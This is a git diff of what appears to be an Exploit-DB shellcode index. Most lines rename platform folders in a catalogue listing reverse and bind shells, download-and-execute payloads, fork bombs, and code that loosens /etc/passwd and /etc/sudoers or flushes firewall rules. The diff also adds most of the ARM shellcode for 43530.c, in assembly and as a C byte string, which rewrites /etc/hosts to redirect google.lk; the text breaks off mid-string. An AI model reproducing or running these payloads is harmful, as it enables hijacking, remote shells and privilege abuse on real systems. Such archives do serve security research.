Shifat",shellcode,win_x86-64 -40808,shellcodes/lin_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,lin_x86-64 -40821,shellcodes/win_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 -40872,shellcodes/lin_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,lin_x86 -40924,shellcodes/lin_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,lin_x86 -40981,shellcodes/win_x86-64/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 -41072,shellcodes/win_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 -41089,shellcodes/lin_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,lin_x86-64 -41128,shellcodes/lin_x86-64/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,lin_x86-64 -41174,shellcodes/lin_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,lin_x86-64 +40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86 +40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64 +40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86 +40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86 +40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86 +40245,shellcodes/windows_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +40246,shellcodes/windows_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +40259,shellcodes/windows_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86 +40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 +40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86 +40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86 +40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 +41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 +41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux 41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator -41282,shellcodes/lin_x86/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,lin_x86 +41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86 41375,shellcodes/linux/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux -41381,shellcodes/win_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,win_x86 -41398,shellcodes/lin_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,lin_x86-64 -41403,shellcodes/lin_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,lin_x86 -41439,shellcodes/lin_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,lin_x86-64 -41467,shellcodes/win_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,win_x86 -41468,shellcodes/lin_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,lin_x86-64 -41477,shellcodes/lin_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,lin_x86-64 -41481,shellcodes/win_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,win_x86 -41498,shellcodes/lin_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64 -41503,shellcodes/lin_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64 -41509,shellcodes/lin_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64 -41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64 -41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86 -43433,shellcodes/lin_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,lin_x86 -43476,shellcodes/lin_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,lin_x86 +41381,shellcodes/windows_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86 +41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64 +41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86 +41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64 +41467,shellcodes/windows_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86 +41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64 +41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64 +41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86 +41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 +41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 +41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 +41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 +41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86 +43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86 +43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86 43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha 43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha 43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha 43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86 -43489,shellcodes/lin_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,lin_x86 +43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86 43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm 43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64 43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64 @@ -641,33 +641,51 @@ id,file,description,date,author,type,platform 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,shellcode,irix 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm -41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,lin_x86 -41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86 -41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,lin_x86 -42295,shellcodes/lin_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,lin_x86 -41723,shellcodes/lin_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,lin_x86 -41750,shellcodes/lin_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,lin_x86-64 -41757,shellcodes/lin_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,lin_x86 -41827,shellcodes/win_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,win_x86-64 -41883,shellcodes/lin_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,lin_x86-64 -41909,shellcodes/lin_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,lin_x86 -41969,shellcodes/lin_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,lin_x86 -41970,shellcodes/lin_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,lin_x86-64 +43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm +43531,shellcodes/arm/43531.c,"Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm +43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm +43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm +43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm +43536,shellcodes/arm/43536.c,"Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)",2009-01-01,"Neil Klopfenstein",shellcode,arm +43537,shellcodes/arm/43537.c,"Linux/StrongARM - setuid() Shellcode (20 bytes)",2009-01-01,funkysh,shellcode,arm +43538,shellcodes/arm/43538.c,"Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)",2009-01-01,funkysh,shellcode,arm +43539,shellcodes/arm/43539.c,"Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)",2009-01-01,funkysh,shellcode,arm +43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc +43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4 +43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4 +43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc +43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 +43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 +43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86 +41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86 +41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86 +42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 +41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 +41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 +41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86 +41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64 +41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 +41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86 +41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86 +41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64 42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows -42126,shellcodes/lin_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,lin_x86-64 -42177,shellcodes/lin_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,lin_x86 -42179,shellcodes/lin_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,lin_x86-64 -42208,shellcodes/lin_x86/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,lin_x86 -42254,shellcodes/lin_x86/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,lin_x86 -42339,shellcodes/lin_x86-64/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,lin_x86-64 -42428,shellcodes/lin_x86/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,lin_x86 -42485,shellcodes/lin_x86-64/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,lin_x86-64 -42522,shellcodes/lin_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,lin_x86-64 -42523,shellcodes/lin_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,lin_x86-64 -42594,shellcodes/lin_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,lin_x86 +42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 +42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86 +42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 +42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86 +42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86 +42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64 +42428,shellcodes/linux_x86/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86 +42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64 +42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 +42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 +42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86 42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm 42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm -42791,shellcodes/lin_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,lin_x86-64 -42977,shellcodes/lin_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,lin_x86 -42992,shellcodes/win_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 +42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64 +42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86 +42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 43463,shellcodes/linux/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux diff --git a/shellcodes/arm/43530.c b/shellcodes/arm/43530.c new file mode 100644 index 000000000..1302fbce6 --- /dev/null +++ b/shellcodes/arm/43530.c @@ -0,0 +1,86 @@ +/* +# Title: Add map in /etc/hosts file - 79 bytes +# Date: 2015-03-02 +# Architecture: armv6l GNU/Linux +# Website: http://osandamalith.wordpress.com +# E-Mail: osanda[cat]unseen.is +# Author: Osanda Malith Jayathissa (@OsandaMalith) + +hosts: file format elf32-littlearm + + +Disassembly of section .text: + +00008054 <_start>: + 8054: e28f6001 add r6, pc, #1 + 8058: e12fff16 bx r6 + 805c: 1b24 subs r4, r4, r4 + 805e: 1c22 adds r2, r4, #0 + 8060: 21ff movs r1, #255 ; 0xff + 8062: 31ff adds r1, #255 ; 0xff + 8064: 31ff adds r1, #255 ; 0xff + 8066: 31ff adds r1, #255 ; 0xff + 8068: 3105 adds r1, #5 + 806a: 4678 mov r0, pc + 806c: 302a adds r0, #42 ; 0x2a + 806e: 2705 movs r7, #5 + 8070: df01 svc 1 + 8072: 2214 movs r2, #20 + 8074: 4679 mov r1, pc + 8076: 310c adds r1, #12 + 8078: 2704 movs r7, #4 + 807a: df01 svc 1 + 807c: 1b24 subs r4, r4, r4 + 807e: 1c20 adds r0, r4, #0 + 8080: 2701 movs r7, #1 + 8082: df01 svc 1 + 8084: 2e373231 mrccs 2, 1, r3, cr7, cr1, {1} + 8088: 2e312e31 mrccs 14, 1, r2, cr1, cr1, {1} + 808c: 6f672031 svcvs 0x00672031 + 8090: 656c676f strbvs r6, [ip, #-1903]! ; 0x76f + 8094: 0a6b6c2e beq 1ae3154 <__bss_end__+0x1ad30b0> + 8098: 6374652f cmnvs r4, #197132288 ; 0xbc00000 + 809c: 6f682f2f svcvs 0x00682f2f + 80a0: 00737473 rsbseq r7, r3, r3, ror r4 + +*/ + +#include +#include + +char *shellcode = "\x01\x60\x8f\xe2" + "\x16\xff\x2f\xe1" + "\x24\x1b" + "\x22\x1c" + "\xff\x21" + "\xff\x31" + "\xff\x31" + "\xff\x31" + "\x05\x31" + "\x78\x46" + "\x2a\x30" + "\x05\x27" + "\x01\xdf" + "\x14\x22" // movs r2, $0x14 ; length + "\x79\x46" + "\x0c\x31" + "\x04\x27" + "\x01\xdf" + "\x24\x1b" + "\x20\x1c" + "\x01\x27" + 